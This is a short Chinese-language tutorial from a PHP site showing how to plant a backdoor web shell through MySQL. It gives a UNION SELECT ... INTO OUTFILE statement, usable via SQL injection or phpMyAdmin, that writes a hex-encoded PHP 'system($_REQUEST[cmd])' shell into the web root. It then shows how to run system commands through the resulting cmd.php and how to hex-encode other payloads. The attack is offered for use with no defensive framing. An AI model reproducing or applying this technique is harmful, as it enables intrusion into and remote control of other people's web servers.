通过Mysql的语句生成后门木马的方法
发布:smiling 来源: PHP粉丝网 添加日期:2013-11-14 21:27:22 浏览: 评论:0
通过Mysql 的语句生成后门木马的方法!
SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:2 3 <?php system($_REQUEST[cmd]);?>
再通过 http://www.xxx.com/cmd.php?cmd=dir c: 就可以执行系统DOS命令!
哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西?
就是<?php system($_REQUEST[cmd]);?>的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!
Tags: Mysql语句 后台木马
分享到:
相关文章
- ·mysql中insert into select语句测试(2014-09-23)
- ·MySQL中if case条件语句基本用法(2014-09-24)
- ·如何启用MySQL的查询语句缓存(2014-09-25)
- ·MySQL启用查询语句缓存方法(2014-09-28)
- ·查看mysql的warnings警告错误语句(2014-09-29)
- ·MySQL Select 语句检索记录使用详解(2014-10-03)
- ·MySQL中Update与Insert语句用法详解(2014-10-03)
- ·mysql语句转义,sql特殊字符转义(sql防注入)(2014-10-03)
- ·Mysql中SELECT INTO 语句用法详解(2014-10-03)
- ·MySQL 数据库性能优化之SQL语句及查询优化(2014-10-13)
- ·MySQL Replace INTO语句的用法(2014-10-15)
- ·常用mysql几条sql语句(2014-10-17)
推荐文章
热门文章
最新评论文章
- 写给考虑创业的年轻程序员(10)
- PHP新手上路(一)(7)
- 惹恼程序员的十件事(5)
- PHP邮件发送例子,已测试成功(5)
- 致初学者:PHP比ASP优秀的七个理由(4)
- PHP会被淘汰吗?(4)
- PHP新手上路(四)(4)
- 如何去学习PHP?(2)
- 简单入门级php分页代码(2)
- php中邮箱email 电话等格式的验证(2)